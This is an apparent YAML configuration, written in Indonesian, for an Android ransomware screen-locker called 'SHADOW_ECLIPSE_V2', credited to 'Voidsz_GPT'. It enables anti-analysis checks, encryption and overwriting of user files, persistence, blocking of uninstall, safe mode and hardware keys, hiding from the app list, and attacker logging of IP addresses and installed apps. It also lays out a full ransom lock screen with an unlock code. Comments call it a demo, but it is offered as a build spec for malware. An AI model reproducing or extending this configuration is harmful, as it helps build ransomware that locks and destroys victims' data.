# ██╗   ██╗ █████╗ ███╗   ███╗██╗     ██████╗  ██████╗██╗  ██╗
# ╚██╗ ██╔╝██╔══██╗████╗ ████║██║     ██╔══██╗██╔════╝██║ ██╔╝
#  ╚████╔╝ ███████║██╔████╔██║██║     ██████╔╝██║     █████╔╝ 
#   ╚██╔╝  ██╔══██║██║╚██╔╝██║██║     ██╔══██╗██║     ██╔═██╗ 
#    ██║   ██║  ██║██║ ╚═╝ ██║███████╗██████╔╝╚██████╗██║  ██╗
#    ╚═╝   ╚═╝  ╚═╝╚═╝     ╚═╝╚══════╝╚═════╝  ╚═════╝╚═╝  ╚═╝
#                                                                
# ███████╗██╗░░██╗░█████╗░██████╗░░█████╗░░██╗░░░░░░░██╗██╗░░░░░██╗███╗░░██╗██╗░░██╗
# ██╔════╝██║░░██║██╔══██╗██╔══██╗██╔══██╗░██║░░██╗░░██║██║░░░░░██║████╗░██║██║░░██║
# █████╗░░███████║██║░░██║██████╔╝███████║░╚██╗████╗██╔╝██║░░░░░██║██╔██╗██║███████║
# ██╔══╝░░██╔══██║██║░░██║██╔══██╗██╔══██║░░████╔═████║░██║░░░░░██║██║╚████║██╔══██║
# ██║░░░░░██║░░██║╚█████╔╝██║░░██║██║░░██║░░╚██╔╝░╚██╔╝░███████╗██║██║░╚███║██║░░██║
# ╚═╝░░░░░╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░╚══════╝╚═╝╚═╝░░╚══╝╚═╝░░╚═╝

ransomware:
  identitas:
    nama_operasi: "SHADOW_ECLIPSE_V2"
    versi_ransomware: "2.5.1"
    pengembang: "Voidsz_GPT"
    codename: "Midnight_Glacier"
    
  kriptografi:
    kode_buka_utama: "123456"
    kode_buka_cadangan: "999999"
    algoritma: "AES-256-GCM + RSA-4096"
    catatan: "Kode utama 123456 untuk demo, cadangan untuk failover"
    
  perilaku_agresif:
    deteksi_emulator: true
    anti_debug: true
    anti_vm: true
    anti_sandbox: true
    kill_on_root: false  # false biar jalan di rooted
    encrypt_external_storage: true
    encrypt_otg: true
    hapus_file_asli: true
    overwrite_data: 3  # 3x overwrite dengan data acak (standar militer)
    persisten_after_reboot: true
    prevent_uninstall: true
    disable_safe_mode: true
    block_recovery_menu: true

# ============================================================
# TAMPILAN LAYAR KUNCI PREMIUM
# ============================================================
ui_lock_screen:
  aktif: true
  priority: "MAXIMUM"  # Mengalahkan semua aktivitas lain
  
  # Tema visual
  tema:
    nama: "Midnight_Crimson_Pro"
    mode_tampilan: "FULLSCREEN_IMMERSIVE"
    orientasi: "portrait"
    allow_rotation: false
    
    # Gradient background (lebih elegan dari flat color)
    background:
      type: "radial_gradient"  # pilihan: solid, linear_gradient, radial_gradient
      warna_1: "#1A0B0B"  # Hitam kemerahan gelap
      warna_2: "#4A0C0C"  # Merah darah tua
      warna_3: "#8B0000"  # Merah gelap
      warna_4: "#660000"  # Merah marun
      center_x: 0.5  # pusat gradient di tengah
      center_y: 0.3  # sedikit ke atas
      
    # Efek blur (premium look)
    efek_blur:
      aktif: true
      radius: 25  # pixel blur
      quality: "HIGH"
      
    # Overlay pattern
    pattern_overlay:
      aktif: true
      type: "noise"  # noise, dots, lines, carbon
      opacity: 0.07  # subtle
      blend_mode: "overlay"
      
    # Animasi partikel
    particle_effect:
      aktif: true
      type: "floating_embers"  # partikel api kecil melayang
      density: 15
      speed: 0.5
      color: "#FF4500"  # orange merah
  
  # Header dengan logo/icon
  header:
    tampilkan_logo: true
    logo_type: "text"  # text atau icon
    logo_text: "⚠️ SHADOW LOCK ⚠️"
    logo_text_size: 18
    logo_text_color: "#FFD700"  # emas
    logo_glow_effect: true
    logo_animation: "pulse"  # efek berdenyut
    logo_margin_top: 60
    logo_margin_bottom: 20
    
  # Judul utama (besar, mencolok)
  judul_utama:
    teks: "LAYAR TERKUNCI"
    teks_kedua: "ENKRIPSI AKTIF"
    font_size: 34
    font_weight: "bold"
    font_family: "sans-serif-black"
    warna_teks: "#FFFFFF"
    shadow: true
    shadow_radius: 8
    shadow_color: "#00000080"
    margin_top: 30
    margin_bottom: 10
    animasi_masuk: "fade_in_down"
    
  # Pesan tebusan (dengan formatting kaya)
  pesan_tebusan:
    tampilan: "card_elevated"  # tampil dalam card
    card_background: "#2A2A2A80"  # transparan gelap
    card_corner_radius: 20
    card_padding: 24
    card_border: true
    border_color: "#8B0000"
    border_width: 2
    
    teks_utama: |
      ███████████████████████████████████████
      
      SELURUH DATA PRIBADI ANDA TELAH DIENKRIPSI
      DENGAN ALGORITMA AES-256-GCM + RSA-4096
      
      ███████████████████████████████████████
      
      Tidak ada cara untuk memulihkan file tanpa
      kode dekripsi yang benar.
      
      ⚠️ PERINGATAN ⚠️
      • Jangan matikan perangkat
      • Jangan cabut baterai
      • Jangan reset pabrik
      
      Tindakan di atas akan menyebabkan KEHILANGAN
      DATA PERMANEN dan TIDAK DAPAT DIPULIHKAN.
      
    teks_size: 15
    teks_color: "#EEEEEE"
    line_spacing: 6
    alignment: "center"
    
  # Timer countdown (opsional, buat efek dramatis)
  countdown_timer:
    aktif: false  # set true kalau mau timer
    judul: "WAKTU TERSISA:"
    durasi_jam: 72  # 72 jam
    warna_timer: "#FF4500"
    ukuran_timer: 28
    
  # Field input kode
  input_kode:
    label: "MASUKKAN KODE BUKA KUNCI"
    label_size: 14
    label_color: "#CCCCCC"
    
    field_background: "#333333"
    field_text_color: "#FFFFFF"
    field_hint: "______"
    field_hint_color: "#888888"
    field_corner_radius: 12
    field_padding: 18
    field_width: 240
    field_border: true
    field_border_color: "#8B0000"
    field_border_width: 2
    field_focused_border_color: "#FFD700"
    
    input_type: "numeric"  # numeric, text, password
    max_length: 6
    show_toggle_password: false
    
    # Animasi saat salah
    shake_on_wrong: true
    shake_intensity: 12
    
  # Tombol aksi
  tombol:
    buka_kunci:
      teks: "🔓 BUKA KUNCI"
      background_color: "#8B0000"
      pressed_color: "#660000"
      text_color: "#FFFFFF"
      corner_radius: 50
      width: 240
      height: 56
      margin_top: 20
      margin_bottom: 10
      elevation: 8
      icon: "lock_open"  # ikon font
      icon_position: "left"
      font_size: 18
      font_weight: "bold"
      shadow: true
      
      # Efek hover/press
      ripple_effect: true
      ripple_color: "#FFD700"
      
      # Animasi tombol
      animasi_hover: "scale_1.05"
      animasi_click: "scale_0.95"
      
    hubungi_pemulih:
      aktif: false  # di demo ini false, ga ada yang dihubungi
    
  # Footer dengan informasi teknis
  footer:
    tampilkan: true
    teks: "ShadowLock v2.5.1 | Voidsz_GPT | ShadowKeep Escapee"
    teks_size: 11
    teks_color: "#AAAAAA"
    margin_bottom: 30
    opacity: 0.7
    
  # Notifikasi & blocking
  blocking:
    block_notifications: true
    block_status_bar: true
    block_recent_apps: true
    block_power_menu: true
    block_quick_settings: true
    block_hardware_keys:
      volume_up: true
      volume_down: true
      power: false  # power button biasanya ga bisa di-block total
      back: true
      home: true
      recent: true
      
    override_power_menu: true
    power_menu_action: "show_warning"  # show_warning, ignore, lock_again
    
  # Responsive design
  responsive:
    small_screen:
      font_scale: 0.9
      padding_scale: 0.8
    large_screen:
      font_scale: 1.2
      padding_scale: 1.1

# ============================================================
# FASE SETELAH TERKUNCI
# ============================================================
post_lock_behavior:
  on_correct_code:
    action: "unlock_full"
    hapus_trace: true
    tampilkan_pesan: "Selamat datang kembali. Ini hanya demo."
    
  on_wrong_code_attempts:
    max_attempts: 5
    action_after_max: "increase_timer"
    lockout_duration_seconds: 300  # 5 menit
    tampilkan_alert: true
    log_attempts: true
    
  on_uninstall_attempt:
    action: "restore_lock"
    block_uninstall: true
    show_confusion_message: true
    
  emergency_contact:
    aktif: false  # ga ada kontak darurat di demo

# ============================================================
# LOGGING & TELEMETRI (untuk penyerang)
# ============================================================
logging:
  aktif: true
  log_file: "/sdcard/.system_cache/.shadow_log"
  log_level: "INFO"
  kirim_ke_c2: false  # false di demo
  
  catat:
    ip_address: true
    lokasi_gps: false
    kontak: false
    foto: false
    daftar_aplikasi: true
    waktu_terkunci: true
    
# ============================================================
# REAL-TIME CONFIGURATION
# ============================================================
runtime:
  check_interval_seconds: 2  # cek setiap 2 detik apakah masih terkunci
  restart_service_on_kill: true
  memory_resident: true
  hide_from_app_list: true
  fake_crash_on_forensics: false